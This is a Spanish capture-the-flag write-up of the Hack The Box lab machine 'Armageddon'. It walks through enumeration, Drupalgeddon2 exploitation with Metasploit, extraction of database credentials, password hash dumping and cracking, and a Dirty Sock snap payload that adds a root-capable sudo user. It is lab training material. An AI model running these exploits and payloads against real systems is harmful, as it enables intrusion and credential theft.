Armageddon es un desafío con una complejidad fácil que verifica tus habilidades para explotar los errores de configuración de usuarios, enumeración, explotación de Drupal y la escalada básica de privilegios.
En primer lugar, como siempre comenzamos lanzando un nmap para comprobar los puertos que están abiertos.
nmap 10.10.10.233
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-16 11:30 CEST
Nmap scan report for 10.10.10.233
Host is up (0.048s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Dado que tiene abierto el puerto 80 lo primero que hacemos en lanzar dirb y acceder mediante nuestro navegador a la pagina web.
dirb http://10.10.10.233
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 16 11:31:14 2021
URL_BASE: http://10.10.10.233/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.233/ ----
+ http://10.10.10.233/cgi-bin/ (CODE:403|SIZE:210)
==> DIRECTORY: http://10.10.10.233/includes/
+ http://10.10.10.233/index.php (CODE:200|SIZE:7440)
==> DIRECTORY: http://10.10.10.233/misc/
==> DIRECTORY: http://10.10.10.233/modules/
==> DIRECTORY: http://10.10.10.233/profiles/
+ http://10.10.10.233/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://10.10.10.233/scripts/
==> DIRECTORY: http://10.10.10.233/sites/
==> DIRECTORY: http://10.10.10.233/themes/
+ http://10.10.10.233/web.config (CODE:200|SIZE:2200)
+ http://10.10.10.233/xmlrpc.php (CODE:200|SIZE:42Dado que no encontramos nada relevante mediante dirb lanzamos cmsmap para ver si encontramos algo por donde tirar.
cmsmap http://10.10.10.233/
[-] Date & Time: 16/05/2021 11:32:38
[I] Threads: 5
[-] Target: http://10.10.10.233 (10.10.10.233)
[M] Website Not in HTTPS: http://10.10.10.233
[I] Server: Apache/2.4.6 (CentOS) PHP/5.4.16
[I] X-Powered-By: PHP/5.4.16
[L] X-Generator: Drupal 7 (http://drupal.org)
[L] X-Frame-Options: Not Enforced
[I] Strict-Transport-Security: Not Enforced
[I] X-Content-Security-Policy: Not Enforced
[L] Robots.txt Found: http://10.10.10.233/robots.txt
[I] CMS Detection: Drupal
[I] Drupal Version: 7.56
[M] EDB-ID: 46510 "Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)"
[M] EDB-ID: 44448 "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)"
[M] EDB-ID: 44449 "Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution"
[M] EDB-ID: 44482 "Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)"
[M] EDB-ID: 44542 "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)"
[M] EDB-ID: 44557 "Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)"
[I] Drupal Theme: bartik
[-] Enumerating Drupal Usernames via "Views" Module...
[-] Enumerating Drupal Usernames via "/user/"...
[I] Autocomplete Off Not Found: http://10.10.10.233/user/
[-] Drupal Default Files:
[-] Drupal is likely to have a large number of default files
[-] Would you like to list them all?
[y/N]: y
[I] http://10.10.10.233/robots.txt
[I] http://10.10.10.233/profiles/README.txt
[I] http://10.10.10.233/modules/README.txt
[I] http://10.10.10.233/INSTALL.txt
[I] http://10.10.10.233/themes/README.txt
[I] http://10.10.10.233/sites/README.txt
[I] http://10.10.10.233/README.txt
[-] Search Drupal Modules ...
[I] comment
[I] content
[I] field
[I] node
[I] search
[I] system
[I] user
[I] Checking for Directory Listing Enabled ...
[L] http://10.10.10.233/profiles
[L] http://10.10.10.233/modules
[L] http://10.10.10.233/themes
[L] http://10.10.10.233/sites
[L] http://10.10.10.233/sites/default
[L] http://10.10.10.233/modules/comment
[L] http://10.10.10.233/modules/field
[L] http://10.10.10.233/modules/node
[L] http://10.10.10.233/modules/search
[L] http://10.10.10.233/modules/system
[L] http://10.10.10.233/modules/user
[-] Date & Time: 16/05/2021 11:33:44
[-] Completed in: 0:01:05mediante cmsmap encontramos que la versión de Drupal es vulnerable a Drupalgeddon (Mas info)
Para explotar dicha vulnerabilidad vamos a utilizar Metasploit
msfconsole
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 10.10.10.233
set lhost 10.10.14.161
exploit
Obtenemos una shell
Comprobamos que accedemos con el usuario apache el cual no tiene permisos
Dado que hemos accedido explotando Drupal y el usuario no tiene permisos vamos a buscar el usuario y contraseña de acceso a la base de datos que tiene configurado Drupal y ver si mediante esa contraseña podemos escalar privilegios.
La configuración de Drupal la podemos encontrar en el fichero /var/www/html/sites/default/settings.php (mas información sobre la configuración)
cat /var/www/html/sites/default/settings.php
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
Con la contraseña obtenida intentamos elevar privilegios como «brucetherealadmin» pero parece ser que no se reutilizo la contraseña.
Dado que es un usuario de base de datos comprobamos si dentro de la base de datos podemos encontrar algún tipo de dato que nos ayude a elevar privilegios.
Listamos las bases de datos existentes:
mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'
Database
information_schema
drupal
mysql
performance_schema
Podemos observar que existe una base de datos llamada Drupal, intentamos listar las tables dentro de esta base de datos:
mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'show tables;'
Tables_in_drupal
actions
authmap
batch
block
block_custom
block_node_type
block_role
blocked_ips
cache
cache_block
cache_bootstrap
cache_field
cache_filter
cache_form
cache_image
cache_menu
cache_page
cache_path
comment
date_format_locale
date_format_type
date_formats
field_config
field_config_instance
field_data_body
field_data_comment_body
field_data_field_image
field_data_field_tags
field_revision_body
field_revision_comment_body
field_revision_field_image
field_revision_field_tags
file_managed
file_usage
filter
filter_format
flood
history
image_effects
image_styles
menu_custom
menu_links
menu_router
node
node_access
node_comment_statistics
node_revision
node_type
queue
rdf_mapping
registry
registry_file
role
role_permission
search_dataset
search_index
search_node_links
search_total
semaphore
sequences
sessions
shortcut_set
shortcut_set_users
system
taxonomy_index
taxonomy_term_data
taxonomy_term_hierarchy
taxonomy_vocabulary
url_alias
users
users_roles
variable
watchdogTras listar las tablas podemos ver algunas tablas interesantes tal como «users»
Viendo el contenido de la base de datos encontramos tiene un registro en donde se ve la contraseña hasheada del usuario: brucetherealadmin
mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users ;'
<er -pCQHEy@9M*m23gBVj -D drupal -e 'select name,pass from users ;'
name pass
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
f4x000 $S$D2yOIvdySodkArt8ZeKycmseA8c/x7hrl5G9dcChsRaFhbX6R6Ad
Utilizando john the ripper y el diccionario rockyou intentamos obtener la contraseña
john hash.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 32768 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
booboo (?)
1g 0:00:00:01 DONE (2021-05-18 13:34) 0.8403g/s 201.6p/s 201.6c/s 201.6C/s tiffany..chris
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Accedemos mediante ssh con el usuario brucetherealadmin
Obtenemos la primera flag
[brucetherealadmin@armageddon ~]$ ls
user.txt
[brucetherealadmin@armageddon ~]$ cat user.txt
94ced24b6e7f65bfa8a1844706b18fae
Comprobamos que el usuario brucetherealadmin tiene permiso para ejecutar snap mediante SUDO
sudo -l
[brucetherealadmin@armageddon tmp]$ sudo -l
Matching Defaults entries for brucetherealadmin on armageddon:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *
Mediante snap podemos elevar privilegios explotando la vulnerabilidad Dirty Sock (Mas información)
Creamos el paquete
python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A"*4256 + "=="' | base64 -d > DcodeZero.snapEl contenido del paquete es el siguiente:
useradd dirty_sock -m -p '$6$sWZcW1t25pfUdBuX$jWjEZQF2zFSfyGy9LbvG3vFzzHRjXfBYK0SOGfMD1sLyaS97AwnJUs7gDCY.fg19Ns3JwRdDhOcEmDpBVlF9m.' -s /bin/bash
usermod -aG sudo dirty_sock
echo "dirty_sock ALL=(ALL:ALL) ALL" >> /etc/sudoers
name: dirty-sock
version: '0.1'
summary: Empty snap, used for exploit
description: 'See https://github.com/initstring/dirty_sock
'
architectures:
- amd64
confinement: devmode
grade: devel
�YZ��7zXZi"�6�S�!�����K]j;n��Q�b3ʶ]I-�,����Hʭ�E��k�qj|��$l5K�(�y����#�Jq_ͼӡ�h�D��u������e�?U�V���þ�Xx�h#�?>0
�YZ8��<\���>��[brucetherealadmin@armageddon tmp]$ �'�yE@��g��o�G>0
Instalamos el paquete generado anteriormente
sudo /usr/bin/snap install --devmode DcodeZero.snapComprobamos que se creo el usuario dirty_sock
Nos logamos con el usuario dirty_scok contraseña: dirty_sock y elevamos privilegios como root
Obtenemos la flag de root
[root@armageddon ~]# cat /root/root.txt
e898a292e471e4b125ea260cfde02451
[root@armageddon ~]# 
:wq!